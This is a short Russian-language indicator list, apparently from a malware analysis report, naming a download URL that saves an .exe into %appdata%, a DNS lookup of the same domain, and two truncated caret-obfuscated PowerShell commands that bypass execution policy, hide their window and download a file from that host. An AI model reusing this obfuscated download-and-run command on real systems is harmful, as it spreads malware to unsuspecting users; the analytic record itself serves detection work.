Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^we^Rsh^elL.eX^e^ -exeC^uT^i^oNP^O^licY^ ^b^Yp^As^S -^NOPrOf^ilE^ -wIndOw^sT^Yle^ HiDDe^N^ (^ne^w^-o^B^jeC^T^ S^YST^EM.nE^t.^WebCL^ieNT^).d^oWN^L^oaDFiLE^('http://sutraponef.t...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "po^we^Rsh^elL.eX^e^ -exeC^uT^i^oNP^O^licY^ ^b^Yp^As^S -^NOPrOf^ilE^ -wIndOw^sT^Yle^ HiDDe^N^ (^ne^w^-o^B^jeC^T^ S^YST^EM.nE^t.^WebCL^ieNT^).d^oWN^L^oaDFiLE^('http://sutraponef.t...' (со скрытым окном)